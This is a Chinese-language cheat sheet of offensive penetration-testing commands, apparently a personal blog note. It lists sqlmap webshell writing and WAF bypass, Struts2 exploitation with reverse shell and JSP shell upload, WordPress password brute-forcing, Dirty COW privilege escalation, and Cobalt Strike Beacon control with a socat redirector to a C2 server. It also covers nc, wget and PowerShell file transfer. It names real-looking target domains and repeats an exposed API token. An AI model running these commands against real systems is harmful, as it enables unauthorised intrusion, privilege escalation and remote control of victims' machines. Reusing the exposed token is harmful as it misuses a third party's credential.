各种渗透小工具常用命令参数总结
渗透过程中用到很多小工具:有的时候指令参数感觉比较难记,去搜还比较费时间,所以想了一个小办法提高效率,把常用的参数本地记下来,时不时看一看,或者用的时候直接修改贴上去就行,如下:(本机环境python默认为python3,python2为python2)
sqlmap
常用指令:
--identify-waf sqlmap安全狗试探
--technique B E U S T
--random-agent --dbs --delay 2 -v 3 --risk 3 --batch
–os-pwn 联动MSF反弹shell
sqlmap -d "mssql://uset:password@ip:port/dbname" --os-shell 外连数据库操作命令
--os-shell 写入webshell或者命令shell 默认会有一个命令文件和上传文件
python sqlmap.py -u "hid=1" --file-dest="E://php///phpinfo.php写入目标路径" --file-write="E:/WWW//phpinfo.php本地shell路径" 写之前先看dba --privileges
绕过防护:--tamper
WTS:and换成&& symboliclogical.py
sublist3r 目录爆破 python2.7 python3.4
python2 sublist3r.py -b -v -d lzu.edu.cn -p 80,443 -t 50 -o lzu.txt
OneForAll 子域名收集 py3.7
oneforall模块:
python oneforall.py --target 1.txt --format=txt --brute=true run
dirmap
单目标 python dirmap.py -i https://target.com -lcf python dirmap.py -i 192.168.1.1 -lcf
子网 python dirmap.py -i 192.168.1.0/24 -lcf python dirmap.py -i 192.168.1.1-192.168.1.100 -lcf
文件读取 python dirmap.py -iF targets.txt -lcf
Arjun 请求参数fuzz工具:一般参数fuzz可以从JS中找到 py3
单个URL:python arjun.py -u https://api.example.com/endpoint --get 或者--post -t 22 多线程 -d 2延迟
多个URL:python arjun.py --urls targets.txt --get --include '{"api_key":"xxxxx"}'API密钥
对HTTP参数进行fuzz py>3.4 -t 20 设置线程 --headers 加请求头
python arjun.py -u https://api.example.com/endpoint --get/--post 不同请求
python arjun.py -u https://api.example.com/endpoint --get -d 2 延搁请求发送时间
python arjun.py -u https://api.example.com/endpoint --get --include 'api_key=xxxxx' 引入固定数据
nmap
常用命令:
nmap -sS -iL sub_domain.txt -oX school.xml 批量扫描后输出
nmap -p 25 --script smtp-enum-users.nse 202.38.193.203 25端口 邮箱枚举
wpscan https://wpvulndb.com/users/edit --force | -f 不检查网站运行的是不是`WordPress`
wpscan --url https://wp.tutorabc.com/ -e --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I #-e简单进行整体快速扫描
wpscan --url http://10.10.10.10 --enumerate vp --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I 简单扫描WP插件
wpscan --url https://intro.vipjr.com --enumerate ap --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I 完整扫描WP插件
wpscan --url http://10.10.10.10 --enumerate u 枚举WP用户名
wpsan --url http://10.10.10.10 --enumerate vt 扫描所使用的主题和漏洞
wpscan -u https://www.xxxxxx.wiki/ -enumerate tt TimThumbs文件漏洞扫描
wpscan --url http://10.10.10.128/wordpress -P /root/Desktop/xray/rockyou.txt -U admin -t 100 #指定用户名为admin,密码为 /root/Desktop/xray/rockyou.txt 字典文件中的数据 设置线程100
xray
xray.exe webscan --listen 127.0.0.1:1111 --html-output awvs.html 联动
xray.exe webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler.html 爬虫自动挖
Crawlergo targets.txt 里面的地址放http://testphp.vulnweb.com/这个格式
python launcher_new.py
Struts2-Scan: py3
python Struts2Scan.py --info 查看信息
python Struts2Scan.py -u http://192.168.100.8:8080/index.action 单个检测
python Struts2Scan.py -f urls.txt 批量检测
python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec 指定漏洞 命令执行
python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888 反弹shell
python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath 获取web路径
python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp 上传shell
WebCrack.py py3 后台爆破 不支持验证码 爆破结果:web_crack_ok.txt
python WebCrack.py
输入文件名则进行批量爆破,输入URL则进行单域名爆破
Docker docker version docker info docker --help
镜像命令
docker images 查看所有镜像
docker search “tomcat” 或从http://hub.docker.com查
docker pull tomcat 下载镜像
docker rmi tomcat 删除镜像
容器命令
docker run -it --tomcat 运行
docker run -p 8080:8080 镜像名 端口映射执行
docker ps -a 列出正在运行的容器
docker ps -aq 列出正在运行的容器ID
exit 容器停止并退出
docker start 容器ID 启动容器
docker restart 容器ID 重启容器
docker stop 容器ID 停止容器
docker stop $(docker ps -aq) 停止所有容器
docker attach 容器ID 直接进入容器启动命令的终端,不会启动新的进程
docker cp mycontainer:/opt/file.txt /opt/local/ 复制文件
docker-compose down 环境移除
docker image prune -f -a 删除所有暂时不使用的镜像
docker container prune -f 删除所有停止的镜像
docker-compose run --rm -p 8080:80 web docker容器端口映射
docker network prune 不被docker使用的network都将被清理掉
docker exec -ti name /bin/bash 进入docker容器查看
杀死占用端口命令:
kill -9 $(lsof -i tcp:进程号 -t)
sudo kill -s 9 $(lsof -i:端口号 -t)
docker ps |awk '{print($1)}' |xargs -n 1 docker stop
脏牛提权:dirty.c 大于2.6.22版本(Linux bogon)
查看版本:uname -a
编译:gcc -pthread dirty.c -o dirty -lcrypt
执行: ./dirty 低权限用户名
kali搜索版本漏洞:searchsploit ubuntu 16
CS4.0
传输器 传输体
监听器(Beacon Foreign )Beacon是CS的Payload
Beacon有两种通信模式。(异步通信模式/交互式通信模式)
Beacon的类型(HTTP 和 HTTPS Beacon/DNS Beacon/SMB Beacon)
重定向器(目标靶机 <-------->多个并列的重定向器<------>CS服务器)
socat TCP4-LISTEN:9999,fork TCP4:158.247.199.169:9999 socat转发流量到CS服务器
Beacon 命令
help 查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin
note 给当前目录机器起个名字, eg: note beacon-shell
cd 在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用'/' eg: cd c:\\
mkdir 新建目录, eg: mkdir d:\\beacon
rm 删除文件或目录, eg: rm d:\\beacon
upload 上传文件到目标系统中
download 从目标系统下载指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel 取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
shell 在目标系统中执行指定的cmd命令, eg: shell whoami
getuid 查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
pwd 查看当前在目录系统中的路径
ls 列出当前目录下的所有文件和目录
drives 列表出目标系统的所有分区[win中叫盘符]
ps 查看目标系统当前的所有的进程列表
kill 杀掉指定进程, eg: kill 4653
sleep 10 指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
jobs 列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
jobkill 如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345
clear 清除beacon内部的任务队列
checkin 强制让被控端回连一次
exit 终止当前beacon 会话
ctrl + k 清屏
checkin 激活beacon 使其回连
help mode 查看传输模式
mode dns 传输模式-dns(每次传输4比特数据)
mode dns-txt 切换传输模式-dns-txt(每次传输189比特数据)
WeblogicScan python3
python WeblogicScan.py -u 127.0.0.1 -p 7001 单点
python WeblogicScan.py -f target.txt 批量 txt格式127.0.0.1:7001 或127.0.0.1 或127.0.0.1:700
命令行终端下载:
wget -b http://www.sample-videos.com/video/mp4/big.mp4 隐藏下载
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4 下载重命名
python:
#!python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
Netcat
cat file | nc -l 1234 攻击机将文件放到1234端口
nc host_ip 1234 > file 目标机连接该端口就会接收到
powershell:
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")
http://xl.bhcy.cn/addme.asp
python atlas.py --url http://eci-2zedsrkf2aml8sk5i8w3.cloudeci1.ichunqiu.com/?id=%%1%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Nginx 配置
sudo systemctl stop nginx
systemctl start nginx
systemctl restart nginx
systemctl reload nginx 一些配置更改后,重新加载Nginx服务
systemctl disable nginx 禁止Nginx服务在服务器启动时启动
netstat -tulnp | grep ":53" 看端口是否被占用
netstat -ntlp 查看端口使用情况
service iptables status
iptables -A INPUT -ptcp --dport 53 -j ACCEPT 开端口
持续更新,算个小分享和学习方法分享吧